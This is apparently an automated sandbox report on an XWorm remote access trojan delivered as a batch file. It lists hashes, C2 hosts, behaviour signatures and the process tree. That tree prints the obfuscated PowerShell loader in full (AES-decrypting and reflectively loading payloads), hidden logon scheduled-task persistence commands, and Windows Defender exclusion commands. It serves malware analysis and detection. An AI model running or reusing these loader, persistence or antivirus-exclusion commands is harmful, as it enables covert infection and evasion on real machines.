xworm | 1bb8c8c19237b327822cc6fbc537b9c4d50c549ff15f4e71abf84a2341eec0db

Analysis

max time kernel
101s
max time network
109s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
15-07-2024 03:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

IpGeolocation.bat
Size

610KB
MD5

624933026776b6141b7ca87c9eccb8d8
SHA1

d7d6388d6266360e14d7c6b56141a92053514387
SHA256

1bb8c8c19237b327822cc6fbc537b9c4d50c549ff15f4e71abf84a2341eec0db
SHA512

2d4617a578a45ee95e958fca89fbcd37882d9ca0d4b9a41e354d2901e3e19b75e9a96b7da5c9e5fdef3c9358bae06529bc3f9e2a74ae83fc3c62ae71a52f8958
SSDEEP

12288:M6nt5tlBhJSv4euiIl0Mhw0NbmInJpiudZtifyI72IaeYeeI:MQLlwdIyMhPnJpiWy5YdI

Score

10^/10

xworm execution rat trojan

Malware Config

Extracted

Family

xworm

cd-breast.gl.at.ply.gg:15244

updated-password.gl.at.ply.gg:15244

Attributes

Install_directory
%ProgramData%
install_file
SystemProcess.exe

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral2/memory/4688-53-0x000001DEEEAB0000-0x000001DEEEACC000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Blocklisted process makes network request 5 IoCs

flow	pid	Process
18	4688	powershell.exe
21	4688	powershell.exe
36	4688	powershell.exe
40	4688	powershell.exe
45	4688	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1456	powershell.exe
2084	powershell.exe
4388	powershell.exe
4240	powershell.exe
4688	powershell.exe
3884	powershell.exe
2964	powershell.exe
4820	powershell.exe
2800	powershell.exe
1972	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Control Panel\International\Geo\Nation	WScript.exe

Deletes itself 1 IoCs

pid	Process
4688	powershell.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemProcess.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemProcess.lnk	powershell.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
17	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 26 IoCs

pid	Process
2800	powershell.exe
2800	powershell.exe
1972	powershell.exe
1972	powershell.exe
4688	powershell.exe
4688	powershell.exe
4840	powershell.exe
4840	powershell.exe
3884	powershell.exe
3884	powershell.exe
2964	powershell.exe
2964	powershell.exe
1456	powershell.exe
1456	powershell.exe
2084	powershell.exe
2084	powershell.exe
4388	powershell.exe
4388	powershell.exe
4388	powershell.exe
4820	powershell.exe
4820	powershell.exe
4820	powershell.exe
4240	powershell.exe
4240	powershell.exe
4240	powershell.exe
4688	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2800	powershell.exe
Token: SeDebugPrivilege	1972	powershell.exe
Token: SeIncreaseQuotaPrivilege	1972	powershell.exe
Token: SeSecurityPrivilege	1972	powershell.exe
Token: SeTakeOwnershipPrivilege	1972	powershell.exe
Token: SeLoadDriverPrivilege	1972	powershell.exe
Token: SeSystemProfilePrivilege	1972	powershell.exe
Token: SeSystemtimePrivilege	1972	powershell.exe
Token: SeProfSingleProcessPrivilege	1972	powershell.exe
Token: SeIncBasePriorityPrivilege	1972	powershell.exe
Token: SeCreatePagefilePrivilege	1972	powershell.exe
Token: SeBackupPrivilege	1972	powershell.exe
Token: SeRestorePrivilege	1972	powershell.exe
Token: SeShutdownPrivilege	1972	powershell.exe
Token: SeDebugPrivilege	1972	powershell.exe
Token: SeSystemEnvironmentPrivilege	1972	powershell.exe
Token: SeRemoteShutdownPrivilege	1972	powershell.exe
Token: SeUndockPrivilege	1972	powershell.exe
Token: SeManageVolumePrivilege	1972	powershell.exe
Token: 33	1972	powershell.exe
Token: 34	1972	powershell.exe
Token: 35	1972	powershell.exe
Token: 36	1972	powershell.exe
Token: SeIncreaseQuotaPrivilege	1972	powershell.exe
Token: SeSecurityPrivilege	1972	powershell.exe
Token: SeTakeOwnershipPrivilege	1972	powershell.exe
Token: SeLoadDriverPrivilege	1972	powershell.exe
Token: SeSystemProfilePrivilege	1972	powershell.exe
Token: SeSystemtimePrivilege	1972	powershell.exe
Token: SeProfSingleProcessPrivilege	1972	powershell.exe
Token: SeIncBasePriorityPrivilege	1972	powershell.exe
Token: SeCreatePagefilePrivilege	1972	powershell.exe
Token: SeBackupPrivilege	1972	powershell.exe
Token: SeRestorePrivilege	1972	powershell.exe
Token: SeShutdownPrivilege	1972	powershell.exe
Token: SeDebugPrivilege	1972	powershell.exe
Token: SeSystemEnvironmentPrivilege	1972	powershell.exe
Token: SeRemoteShutdownPrivilege	1972	powershell.exe
Token: SeUndockPrivilege	1972	powershell.exe
Token: SeManageVolumePrivilege	1972	powershell.exe
Token: 33	1972	powershell.exe
Token: 34	1972	powershell.exe
Token: 35	1972	powershell.exe
Token: 36	1972	powershell.exe
Token: SeIncreaseQuotaPrivilege	1972	powershell.exe
Token: SeSecurityPrivilege	1972	powershell.exe
Token: SeTakeOwnershipPrivilege	1972	powershell.exe
Token: SeLoadDriverPrivilege	1972	powershell.exe
Token: SeSystemProfilePrivilege	1972	powershell.exe
Token: SeSystemtimePrivilege	1972	powershell.exe
Token: SeProfSingleProcessPrivilege	1972	powershell.exe
Token: SeIncBasePriorityPrivilege	1972	powershell.exe
Token: SeCreatePagefilePrivilege	1972	powershell.exe
Token: SeBackupPrivilege	1972	powershell.exe
Token: SeRestorePrivilege	1972	powershell.exe
Token: SeShutdownPrivilege	1972	powershell.exe
Token: SeDebugPrivilege	1972	powershell.exe
Token: SeSystemEnvironmentPrivilege	1972	powershell.exe
Token: SeRemoteShutdownPrivilege	1972	powershell.exe
Token: SeUndockPrivilege	1972	powershell.exe
Token: SeManageVolumePrivilege	1972	powershell.exe
Token: 33	1972	powershell.exe
Token: 34	1972	powershell.exe
Token: 35	1972	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4688	powershell.exe

Suspicious use of WriteProcessMemory 38 IoCs

description	pid	Process	procid_target
PID 3572 wrote to memory of 2800	3572	cmd.exe	87
PID 3572 wrote to memory of 2800	3572	cmd.exe	87
PID 2800 wrote to memory of 1972	2800	powershell.exe	89
PID 2800 wrote to memory of 1972	2800	powershell.exe	89
PID 2800 wrote to memory of 4852	2800	powershell.exe	92
PID 2800 wrote to memory of 4852	2800	powershell.exe	92
PID 4852 wrote to memory of 3028	4852	WScript.exe	93
PID 4852 wrote to memory of 3028	4852	WScript.exe	93
PID 3028 wrote to memory of 4688	3028	cmd.exe	95
PID 3028 wrote to memory of 4688	3028	cmd.exe	95
PID 4688 wrote to memory of 1192	4688	powershell.exe	96
PID 4688 wrote to memory of 1192	4688	powershell.exe	96
PID 4688 wrote to memory of 1056	4688	powershell.exe	97
PID 4688 wrote to memory of 1056	4688	powershell.exe	97
PID 1192 wrote to memory of 5028	1192	cmd.exe	100
PID 1192 wrote to memory of 5028	1192	cmd.exe	100
PID 1192 wrote to memory of 4408	1192	cmd.exe	101
PID 1192 wrote to memory of 4408	1192	cmd.exe	101
PID 1192 wrote to memory of 4840	1192	cmd.exe	102
PID 1192 wrote to memory of 4840	1192	cmd.exe	102
PID 1056 wrote to memory of 3884	1056	cmd.exe	103
PID 1056 wrote to memory of 3884	1056	cmd.exe	103
PID 3884 wrote to memory of 2964	3884	powershell.exe	104
PID 3884 wrote to memory of 2964	3884	powershell.exe	104
PID 3884 wrote to memory of 3852	3884	powershell.exe	106
PID 3884 wrote to memory of 3852	3884	powershell.exe	106
PID 3852 wrote to memory of 4280	3852	WScript.exe	107
PID 3852 wrote to memory of 4280	3852	WScript.exe	107
PID 4688 wrote to memory of 1456	4688	powershell.exe	109
PID 4688 wrote to memory of 1456	4688	powershell.exe	109
PID 4688 wrote to memory of 2084	4688	powershell.exe	111
PID 4688 wrote to memory of 2084	4688	powershell.exe	111
PID 4688 wrote to memory of 4388	4688	powershell.exe	113
PID 4688 wrote to memory of 4388	4688	powershell.exe	113
PID 4280 wrote to memory of 4820	4280	cmd.exe	115
PID 4280 wrote to memory of 4820	4280	cmd.exe	115
PID 4688 wrote to memory of 4240	4688	powershell.exe	116
PID 4688 wrote to memory of 4240	4688	powershell.exe	116

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\IpGeolocation.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3572
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('d+tjLDCPBIWMxcwncrBccwSeRNMmRhl2Y45p/urqvjk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JQ61hnvf3GQSlcjvuUmFtg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $inpxI=New-Object System.IO.MemoryStream(,$param_var); $oNRYQ=New-Object System.IO.MemoryStream; $uMrRr=New-Object System.IO.Compression.GZipStream($inpxI, [IO.Compression.CompressionMode]::Decompress); $uMrRr.CopyTo($oNRYQ); $uMrRr.Dispose(); $inpxI.Dispose(); $oNRYQ.Dispose(); $oNRYQ.ToArray();}function execute_function($param_var,$param2_var){ $dIinJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KfnHU=$dIinJ.EntryPoint; $KfnHU.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\IpGeolocation.bat';$yTaDG=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\IpGeolocation.bat').Split([Environment]::NewLine);foreach ($jRjNl in $yTaDG) { if ($jRjNl.StartsWith(':: ')) { $AYgTF=$jRjNl.Substring(3); break; }}$payloads_var=[string[]]$AYgTF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2800
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_248_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_248.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1972
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_248.vbs"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:4852
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_248.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3028
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('d+tjLDCPBIWMxcwncrBccwSeRNMmRhl2Y45p/urqvjk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JQ61hnvf3GQSlcjvuUmFtg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $inpxI=New-Object System.IO.MemoryStream(,$param_var); $oNRYQ=New-Object System.IO.MemoryStream; $uMrRr=New-Object System.IO.Compression.GZipStream($inpxI, [IO.Compression.CompressionMode]::Decompress); $uMrRr.CopyTo($oNRYQ); $uMrRr.Dispose(); $inpxI.Dispose(); $oNRYQ.Dispose(); $oNRYQ.ToArray();}function execute_function($param_var,$param2_var){ $dIinJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KfnHU=$dIinJ.EntryPoint; $KfnHU.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_248.bat';$yTaDG=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_248.bat').Split([Environment]::NewLine);foreach ($jRjNl in $yTaDG) { if ($jRjNl.StartsWith(':: ')) { $AYgTF=$jRjNl.Substring(3); break; }}$payloads_var=[string[]]$AYgTF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Deletes itself
        Drops startup file
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:4688
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\IPTOOLKIT.bat" "
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1192
        
        C:\Windows\system32\mode.com
        
        mode 75, 30
        7⤵
        
        PID:5028
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        7⤵
        
        PID:4408
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell exit
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4840
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\IpGeolocation.bat" "
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1056
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('A04P+ey4pik6GPjoa9unfqJ1bxh4R228K2soDXNFB4c='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('i4voRM9UgX8znjUxeiNJSA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $rMlxc=New-Object System.IO.MemoryStream(,$param_var); $XWZpQ=New-Object System.IO.MemoryStream; $ZAVVq=New-Object System.IO.Compression.GZipStream($rMlxc, [IO.Compression.CompressionMode]::Decompress); $ZAVVq.CopyTo($XWZpQ); $ZAVVq.Dispose(); $rMlxc.Dispose(); $XWZpQ.Dispose(); $XWZpQ.ToArray();}function execute_function($param_var,$param2_var){ $fRsIo=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $GLWci=$fRsIo.EntryPoint; $GLWci.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\IpGeolocation.bat';$Czxro=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\IpGeolocation.bat').Split([Environment]::NewLine);foreach ($XpmAd in $Czxro) { if ($XpmAd.StartsWith(':: ')) { $aMroT=$XpmAd.Substring(3); break; }}$payloads_var=[string[]]$aMroT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        7⤵
        Command and Scripting Interpreter: PowerShell
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:3884
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_854_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_854.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2964
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_854.vbs"
        8⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:3852
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_854.bat" "
        9⤵
        Suspicious use of WriteProcessMemory
        
        PID:4280
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('A04P+ey4pik6GPjoa9unfqJ1bxh4R228K2soDXNFB4c='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('i4voRM9UgX8znjUxeiNJSA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $rMlxc=New-Object System.IO.MemoryStream(,$param_var); $XWZpQ=New-Object System.IO.MemoryStream; $ZAVVq=New-Object System.IO.Compression.GZipStream($rMlxc, [IO.Compression.CompressionMode]::Decompress); $ZAVVq.CopyTo($XWZpQ); $ZAVVq.Dispose(); $rMlxc.Dispose(); $XWZpQ.Dispose(); $XWZpQ.ToArray();}function execute_function($param_var,$param2_var){ $fRsIo=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $GLWci=$fRsIo.EntryPoint; $GLWci.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_854.bat';$Czxro=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_854.bat').Split([Environment]::NewLine);foreach ($XpmAd in $Czxro) { if ($XpmAd.StartsWith(':: ')) { $aMroT=$XpmAd.Substring(3); break; }}$payloads_var=[string[]]$aMroT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4820
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1456
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2084
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\SystemProcess.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4388
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SystemProcess.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4240

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3660

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x2ec 0x3bc
1⤵
PID:2860

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
661739d384d9dfd807a089721202900b

SHA1
5b2c5d6a7122b4ce849dc98e79a7713038feac55

SHA256
70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

SHA512
81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
a7cc007980e419d553568a106210549a

SHA1
c03099706b75071f36c3962fcc60a22f197711e0

SHA256
a5735921fc72189c8bf577f3911486cf031708dc8d6bc764fe3e593c0a053165

SHA512
b9aaf29403c467daef80a1ae87478afc33b78f4e1ca16189557011bb83cf9b3e29a0f85c69fa209c45201fb28baca47d31756eee07b79c6312c506e8370f7666

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
1400b7208465e875d44190b9b465fcfb

SHA1
ffd77f7fe78207e5a862b4f536d902019a155e26

SHA256
4fc3a908a25bf9861afb2ec7b3f854fadd986ac281b134cb4e89e46ba6aed0c5

SHA512
57596642a72347985ae9dda5a9e8d01a5c6cbeb5fac227d69fa1fbf38ae867ea4f434f9aec8b990ca397295886ce503abad49efed2f6ea7fdd6bf5d803bf1f38

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
07d502f696b18b511b01fb072fffda9f

SHA1
363268597d3bf293998a7715eef96578c8cdc9be

SHA256
9274c98f43748a5c3569a977267ccd28b4c1c5b42ebc6a28fddbf729b425f03f

SHA512
5565a60c26e399cb191bc1378effbf7224397e1a635920e81e022f578eae2dccfaf6a7afeef4eb708fddd295160a64f2d3f547765e333507a3aef7893c254867

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4d2c8d8bf93f9450f044c6ef5dff215a

SHA1
4d6ecc646ee6c124aaf7535c1387445e02734750

SHA256
e77daf5c774ba87a166ccd95c40a7211f605316321e1d421b82fb0fc8ed75eb0

SHA512
c75903513f87ba5fb4da3e19b079be8ba1f451e1f503ed9fdcf3dee82ce9605b87af560a120156a09b3842cdf0c42fb20f7c8cd242e3021d644e959c8536c0aa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
1a11402783a8686e08f8fa987dd07bca

SHA1
580df3865059f4e2d8be10644590317336d146ce

SHA256
9b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0

SHA512
5f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8ec98e3a156787aab5f79cbebdc632fc

SHA1
16ac82aca7ef17ec2b42a125c35b035b994ee81a

SHA256
060218f00604ffb11caa965f998ee2024c0e10d9efd2a9d1044f80e634bc2e5f

SHA512
0de87ae62caf6d280f2b1aa4ace995437c714be91b529b6671909e979c2f56a6c8f0b127892931e3ca319d1a848844f3b5f8a210239b108feb95efe9915678ab

Download Submit
C:\Users\Admin\AppData\Local\Temp\IPTOOLKIT.bat

Filesize
4KB

MD5
0ce7a6b2c21f3f15472a20687662625e

SHA1
93d69bad32ba246f22ea02a5f5696c34aea292c0

SHA256
89fe592e5b40bdd0ff3850893f50d3e178efa6bfaeb7dc64fba4a7d3841327a2

SHA512
6d5ebcb5c38b2d56627daaf9b7f262bb95d1dc6871214c207c2daec3f95464f69e50ee70480c97cc4ce1e343a61b3f2c4d49c8b1fefa73ac8b81d20287aa9763

Download Submit
C:\Users\Admin\AppData\Local\Temp\IpGeolocation.bat

Filesize
308KB

MD5
1f1e818d74e82922fd7d2d659c0c9801

SHA1
f4533cb248e3bf4a5eb8c629f634b94d2f5bce8a

SHA256
bb75edc3166afec3c0ef5ae8bb9b2cd213ef441dcf8cf03462bde9ef10c59dbe

SHA512
f6af63ea06f3791e5ef157709aefe3212f825145cf61499131153746842e3742f0f76c01025ba3f5b2a172750902a235db05a75b580d79492469b5903709598b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cyrsqkby.3mg.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
